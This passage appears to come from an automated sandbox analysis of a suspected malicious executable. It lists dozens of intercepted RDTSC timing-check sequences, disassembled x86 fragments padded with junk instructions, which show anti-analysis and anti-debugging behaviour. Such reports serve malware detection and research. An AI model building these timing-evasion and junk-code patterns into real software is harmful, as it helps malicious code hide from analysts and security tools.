                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF397 second address: 8AF3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3AE second address: 8AF3C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3C0 second address: 8AF3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3C6 second address: 8AF3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF53C second address: 8AF559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE4CD second address: 8AE4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F57D451A1CCh 0x0000000a jmp 00007F57D451A1C4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B16 second address: 8B4B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B1E second address: 8B4B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F57D451A1BDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B32 second address: 8B4B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F57D4F134E0h 0x00000011 jns 00007F57D4F134D6h 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B5C second address: 8B4B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F57D451A1C9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B7A second address: 8B4B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E2h 0x00000009 popad 0x0000000a jbe 00007F57D4F134DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43E5 second address: 8B43EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43EB second address: 8B43F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4540 second address: 8B4551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F57D451A1BCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4551 second address: 8B4557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4557 second address: 8B455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6BD0 second address: 8B6BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F57D4F134D6h 0x0000000a popad 0x0000000b jp 00007F57D4F134E4h 0x00000011 jmp 00007F57D4F134DCh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6BEF second address: 8B6C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C00 second address: 8B6C3D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F57D4F134E2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jc 00007F57D4F134D6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ecx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F57D4F134DEh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C3D second address: 8B6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C42 second address: 8B6C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD87F second address: 8BD889 instructions: 0x00000000 rdtsc 0x00000002 je 00007F57D451A1C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD889 second address: 8BD88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC1E7 second address: 8BC202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC392 second address: 8BC396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC396 second address: 8BC3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F57D451A1C3h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F57D451A1BBh 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC542 second address: 8BC547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87252A second address: 8725B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F57D451A1B6h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jo 00007F57D451A1CFh 0x00000017 jmp 00007F57D451A1C9h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F57D451A1B8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 pushad 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+12483647h] 0x0000003f mov di, D8E2h 0x00000043 add eax, ebx 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007F57D451A1B8h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 00000016h 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f add dx, FCBEh 0x00000064 mov ecx, dword ptr [ebp+122D1B59h] 0x0000006a nop 0x0000006b push edi 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8725B7 second address: 8725BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8725BD second address: 8725F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F57D451A1C8h 0x0000000c nop 0x0000000d mov cl, F1h 0x0000000f push 00000004h 0x00000011 mov cx, C0C1h 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F57D451A1BDh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCBFB second address: 8BCBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCBFF second address: 8BCC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2303 second address: 8C2310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007F57D4F134DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1B6F second address: 8C1B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F57D451A1BEh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F57D451A1B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1B8B second address: 8C1B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C526F second address: 8C527C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F57D451A1BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C49AF second address: 8C49B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4F66 second address: 8C4F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4F6C second address: 8C4F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4F70 second address: 8C4F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4F74 second address: 8C4F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C68EB second address: 8C68F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C68F1 second address: 8C68F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C68F7 second address: 8C68FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC4D2 second address: 8CC4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F57D4F134E6h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC7DD second address: 8CC7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCACD second address: 8CCADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCADD second address: 8CCAE9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D451A1B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCAE9 second address: 8CCB03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCDEE second address: 8CCDF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD0A8 second address: 8CD0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F57D4F134D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD0B5 second address: 8CD0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD0BB second address: 8CD0BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD3B2 second address: 8CD3B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD3B6 second address: 8CD3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F57D4F134D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD9A1 second address: 8CD9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD9A7 second address: 8CD9B3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F57D4F134D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD9B3 second address: 8CD9FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F57D451A1CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F57D451A1C7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD9FF second address: 8CDA09 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F57D4F134D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CDA09 second address: 8CDA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CDA0F second address: 8CDA15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CDA15 second address: 8CDA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CDA1B second address: 8CDA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CDA1F second address: 8CDA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1CCC second address: 8D1CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1CD1 second address: 8D1CE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F57D451A1B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1CE1 second address: 8D1CFF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F57D4F134D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F57D4F134E2h 0x00000016 js 00007F57D4F134D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1CFF second address: 8D1D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F57D451A1BFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1D14 second address: 8D1D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1D1A second address: 8D1D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1D21 second address: 8D1D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1D27 second address: 8D1D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1D2D second address: 8D1D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F57D4F134DEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1EAA second address: 8D1EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2031 second address: 8D2042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2042 second address: 8D2074 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D451A1BAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F57D451A1C1h 0x00000013 jmp 00007F57D451A1C3h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2074 second address: 8D2093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E2h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2093 second address: 8D2097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2097 second address: 8D20A9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F57D4F134DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D21DE second address: 8D21E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D21E2 second address: 8D21F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2395 second address: 8D239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D239B second address: 8D239F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2515 second address: 8D2519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2519 second address: 8D2524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D267F second address: 8D26A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F57D451A1B6h 0x0000000a popad 0x0000000b jne 00007F57D451A1C4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D26A3 second address: 8D26A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D26A9 second address: 8D26AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D26AE second address: 8D26CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E6h 0x00000009 jnc 00007F57D4F134D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D732A second address: 8D7336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F57D451A1B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E089F second address: 8E08C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134DAh 0x00000009 jmp 00007F57D4F134E5h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DEF62 second address: 8DEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DEF69 second address: 8DEFAD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D4F134E9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F57D4F134E5h 0x00000011 push edx 0x00000012 jmp 00007F57D4F134DCh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF285 second address: 8DF289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF3B4 second address: 8DF3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DE734 second address: 8DE73A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E909C second address: 8E90C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E7h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F57D4F134D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E90C5 second address: 8E90CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E90CB second address: 8E90D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F57D4F134D8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
